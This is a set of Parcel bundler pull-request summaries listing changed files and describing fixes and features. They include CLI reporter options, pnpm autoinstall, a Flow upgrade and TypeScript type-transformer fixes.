=> md: support undefined/null

packages/shared/babel-ast-utils/src/generator.js, packages/shared/babel-ast-utils/test/fixtures/control.js
Closes #5931
```js
throw (
/*comment*/
new Error("abc")
);
```
became
```js
throw /*comment*/
new Error("abc");
```
=> Fix throw statement with leading comment on argument

packages/configs/default/index.json, packages/configs/default/package.json, packages/core/core/src/BundlerRunner.js, packages/core/core/src/ParcelConfig.js, packages/core/core/src/Transformation.js, packages/core/core/src/UncommittedAsset.js, packages/core/core/src/loadParcelPlugin.js, packages/core/core/src/requests/ParcelConfigRequest.js, packages/core/core/src/resolveOptions.js, packages/core/core/src/types.js, packages/core/core/src/utils.js, packages/core/core/test/test-utils.js, packages/core/integration-tests/test/api.js, packages/core/package-manager/src/Yarn.js, packages/core/parcel/package.json, packages/core/parcel/src/cli.js, packages/core/types/index.js, packages/reporters/bundle-analyzer/src/BundleAnalyzerReporter.js, packages/reporters/bundle-buddy/src/BundleBuddyReporter.js
```sh
yarn parcel build src/index.js --reporter @parcel/reporter-bundle-buddy
```
Closes T-786
=> Allow specifying reporters on the CLI

packages/core/core/test/Parcel.test.js, packages/core/package-manager/src/Pnpm.js, packages/core/package-manager/src/index.js, packages/core/package-manager/src/installPackage.js, packages/core/utils/src/alternatives.js
Based on https://github.com/parcel-bundler/parcel/pull/4920 (cc @aminya @dishuostec)
Closes https://github.com/parcel-bundler/parcel/issues/3408
```sh
$ pnpx parcel build index.html
Installing @parcel/transformer-posthtml...
@parcel/package-manager: Added 11 packages via pnpm
Installing @parcel/transformer-html...
@parcel/package-manager: Added 1 packages via pnpm
Installing @parcel/packager-html...
@parcel/package-manager: Added 1 packages via pnpm
Installing @parcel/optimizer-htmlnano...
@parcel/package-manager: Added 212 packages via pnpm
✨ Built in 10.52s
dist/index.bba55d6c.js               62 B     32ms
├── Code from unknown sourcefiles    43 B      0ms
└── index.js                         19 B    522ms
dist/index.html                      42 B    5.30s
└── index.html …
```
=> pnpm autoinstall support 

packages/core/core/src/requests/ParcelConfigRequest.js, packages/core/core/test/ParcelConfigRequest.test.js
https://github.com/parcel-bundler/parcel/pull/5905 completely removed the `reporters` entry in the default config.
Adding a parcelrc with `{"extends": "@parcel/config-default", "reporters": ["...", "parcel-reporter-something"]}` then caused an exception because `...` wasn't being replaced if the `"reporters"` entry in the parent config was completely missing.
This was once again caused by `$FlowFixMe` and `any`....
Manifested in `Cannot read property 'includes' of undefined`
=> Fix spread in parcelrc with empty parent

.flowconfig, package.json, packages/core/cache/src/Cache.js, packages/core/core/src/BundlerRunner.js, packages/core/core/src/Graph.js, packages/core/core/src/Transformation.js, packages/core/core/src/Validation.js, packages/core/core/src/assetUtils.js, packages/core/core/src/requests/TargetRequest.js, packages/core/core/src/serializer.js, packages/core/integration-tests/test/hmr.js, packages/core/package-manager/src/NodeResolver.js, packages/core/package-manager/src/NodeResolverSync.js, packages/optimizers/terser/src/TerserOptimizer.js, packages/packagers/html/src/HTMLPackager.js, packages/reporters/dev-server/src/ServerReporter.js, packages/shared/scope-hoisting/src/hoist.js, packages/shared/scope-hoisting/src/link.js, packages/transformers/babel/src/config.js, packages/transformers/js/src/visitors/fs.js, packages/transformers/typescript-types/src/collect.js, packages/transformers/typescript-types/src/shake.js, packages/utils/events/src/ValueEmitter.js, packages/utils/node-resolver-core/src/NodeResolver.js, packages/validators/eslint/src/EslintValidator.js, yarn.lock
This updates Flow to v0.146.0 [0] , which invalidates refinements (particularly object properties and variables declared with `let` passed to functions) much more frequently. This required introducing additional invariants, `nullthrows`, or temporary locals, depending on the number of violations in a given scope.
This is probably a good motivation to use `const` to retain refinements of locals when Flow thinks they could be modified through function calls.
[0] https://github.com/facebook/flow/releases/tag/v0.146.0
=> Update Flow to v0.146.0

packages/utils/node-resolver-core/src/NodeResolver.js, packages/utils/node-resolver-core/test/fixture/node_modules/side-effects-false/package.json, packages/utils/node-resolver-core/test/resolver.js
For imports of subdirectories like `pkg/subdir`, `sideEffects` wasn't read in from `pkg/package.json`.
Prevents situations like
(It's unclear whether this situation has caused actual bugs)
(And this also makes clear why resolvers should behave somewhat deterministically 😄 )
=> Resolver: correctly determine sideEffects for subdir imports `pkg/subdir/`

packages/core/integration-tests/test/integration/ts-types/importing-collision/expected.d.ts, packages/core/integration-tests/test/integration/ts-types/importing-collision/index.ts, packages/core/integration-tests/test/integration/ts-types/importing-collision/other1.ts, packages/core/integration-tests/test/integration/ts-types/importing-collision/other2.ts, packages/core/integration-tests/test/integration/ts-types/importing-collision/package.json, packages/core/integration-tests/test/ts-types.js, packages/transformers/typescript-types/src/TSModule.js, packages/transformers/typescript-types/src/TSModuleGraph.js, packages/transformers/typescript-types/src/TSTypesTransformer.js, packages/transformers/typescript-types/src/collect.js, packages/transformers/typescript-types/src/shake.js
Closes https://github.com/parcel-bundler/parcel/issues/5967
Previously, a module's local bindings could be renamed because of a naming collision. But this new name was never updated in the importing modules
=> ts-types transformer: update importers with naming collisions
